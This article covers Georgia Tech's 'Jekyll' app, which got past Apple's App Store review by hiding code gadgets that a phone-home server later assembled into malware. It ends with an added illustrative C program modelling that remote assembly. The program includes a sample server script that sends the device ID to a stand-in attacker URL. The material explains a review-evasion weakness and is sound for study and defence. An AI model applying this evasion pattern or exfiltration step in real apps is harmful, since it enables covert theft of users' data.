Georgia Tech researchers slip a piece of malware named Jekyll into an app published in the App Store

  Researchers at Georgia Tech set out to show that the App Store review process is not as secure as Apple claims, and by their own account the test succeeded. They relied on the fact that Apple's automated review spends only a few seconds exercising an app, and that is how they got an extremely dangerous app into the App Store. It contained code fragments that were assembled on a command issued remotely, and once assembled they turned the app into a dangerous weapon.

This wasn’t long enough for Apple to notice that an app that purported to offer news from Georgia Tech contained code fragments that later assembled themselves into a malicious digital creature. This malware, which the researchers dubbed Jekyll, could stealthily post tweets, send e-mails and texts, steal personal information and device ID numbers, take photos, and attack other apps. It even provided a way to magnify its effects, because it could direct Safari, Apple’s default browser, to a website with more malware.

  Once the malicious code was assembled, the app could do all of this on its own. At installation it connected to the researchers' servers and asked for commands, so they could direct its activity at will with a few simple instructions.

“The app did a phone-home when it was installed, asking for commands,” says Lu. “This gave us the ability to generate new behavior of the logic of that app which was nonexistent when it was installed.” The Jekyll app was live for only a few minutes in March, and no innocent victims installed it, Lu says. During that brief time, the researchers installed it on their own Apple devices and attacked themselves, then withdrew the app before it could do real harm. Lu says that by monitoring the app, they could tell that Apple ran it for only a few seconds prior to releasing it. During the review, the malicious code had been decomposed into “code gadgets” that were hidden under the cover of legitimate app operations and could be stitched together after approval.

  The app was live in the App Store for only a few minutes, during which the researchers downloaded it and attacked themselves to demonstrate that it worked. They argue that the review process currently rests on a static analysis of the app's code, so malware can easily be hidden inside operations that belong to the app's normal functionality. They want Apple to change its review criteria, though that will probably not happen.

“The message we want to deliver is that right now, the Apple review process is mostly doing a static analysis of the app, which we say is not sufficient because dynamically generated logic cannot be very easily seen,” Lu says.
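The point about static review can be made concrete with a small model. The following C program is an added illustration, not the researchers' code and not how Jekyll itself was built (the article does not describe its internals): it shows the general shape of the evasion, in which each operation present in the binary is a legitimate "gadget" and the sequence that turns them into something harmful is supplied only by the phone-home server after approval. The opcode format, the gadget names, the device ID and the two server responses are all assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Simplified model of remotely assembled behaviour (added example, not Jekyll's
 * own code). Every gadget below is an operation a news app could plausibly
 * perform; nothing in the binary says in what order, or with what data, they run. */

#define BUF 256

typedef struct {
    char device_id[32];   /* value the app can legitimately read */
    char scratch[BUF];    /* string being assembled from fragments */
    char opened_url[BUF]; /* last URL handed to the browser */
    int  messages_sent;   /* number of posts or messages issued */
} App;

/* Gadget: append the device identifier to the scratch buffer. */
static void gadget_read_device_id(App *a) {
    size_t have = strlen(a->scratch);
    strncat(a->scratch, a->device_id, BUF - 1 - have);
}

/* Gadget: append a literal text fragment (bounded copy). */
static void gadget_append_literal(App *a, const char *s, size_t n) {
    size_t have = strlen(a->scratch);
    size_t room = BUF - 1 - have;
    if (n > room) n = room;
    memcpy(a->scratch + have, s, n);
    a->scratch[have + n] = '\0';
}

/* Gadget: hand the assembled string to the browser, then clear it. */
static void gadget_open_url(App *a) {
    snprintf(a->opened_url, BUF, "%s", a->scratch);
    a->scratch[0] = '\0';
}

/* Gadget: send the assembled string as a message/post, then clear it. */
static void gadget_send_message(App *a) {
    a->messages_sent++;
    a->scratch[0] = '\0';
}

/* Assumed opcode format for the script the server returns on phone-home:
 *   'I'           append device id
 *   'L' text ';'  append literal text up to the ';'
 *   'U'           open scratch as a URL
 *   'M'           send scratch as a message
 * Returns the number of gadgets executed, or -1 if the script is malformed. */
int run_remote_script(App *a, const char *script) {
    int executed = 0;
    for (const char *p = script; *p; p++) {
        switch (*p) {
        case 'I': gadget_read_device_id(a); break;
        case 'L': {
            const char *end = strchr(p + 1, ';');
            if (!end) return -1;
            gadget_append_literal(a, p + 1, (size_t)(end - p - 1));
            p = end;
            break;
        }
        case 'U': gadget_open_url(a); break;
        case 'M': gadget_send_message(a); break;
        default:  return -1;
        }
        executed++;
    }
    return executed;
}

/* What a call-graph style static review sees: the gadgets reachable from the
 * dispatcher. The set is identical whether the server later sends a benign or a
 * malicious script, because the script is not part of the binary. */
static const char *STATIC_CALL_GRAPH[] = {
    "gadget_read_device_id", "gadget_append_literal",
    "gadget_open_url", "gadget_send_message",
};
size_t static_reachable_gadgets(void) {
    return sizeof(STATIC_CALL_GRAPH) / sizeof(*STATIC_CALL_GRAPH);
}

App fresh_app(void) {
    App a;
    memset(&a, 0, sizeof a);
    strcpy(a.device_id, "DEVICE-0001"); /* constructed sample value */
    return a;
}

/* Run a script on a fresh app and report the URL it ended up opening (NULL if malformed). */
const char *url_opened_by(const char *script) {
    static App a;
    a = fresh_app();
    if (run_remote_script(&a, script) < 0) return NULL;
    return a.opened_url;
}

/* Run a script on a fresh app and report how many messages it sent (-1 if malformed). */
int messages_sent_by(const char *script) {
    App a = fresh_app();
    if (run_remote_script(&a, script) < 0) return -1;
    return a.messages_sent;
}

int main(void) {
    /* Constructed server responses: the same binary, two very different behaviours. */
    const char *benign    = "Lhttps://news.example.org/;U";
    const char *malicious = "Lhttps://attacker.invalid/collect?id=;IU" "Lhello from jekyll;M";
    printf("benign    : opened %s\n", url_opened_by(benign));
    printf("malicious : opened %s, messages sent %d\n",
           url_opened_by(malicious), messages_sent_by(malicious));
    printf("static view in both cases: %zu reachable gadgets\n", static_reachable_gadgets());
    return 0;
}
```

Both responses exercise exactly the four operations a reviewer would enumerate, so a review that only lists what the app can call sees no difference; the harmful composition (device ID appended to an attacker URL, then opened in the browser) exists only once the server has answered. Catching it requires either running the app against the live server or treating network-supplied data that drives control flow as a finding in itself.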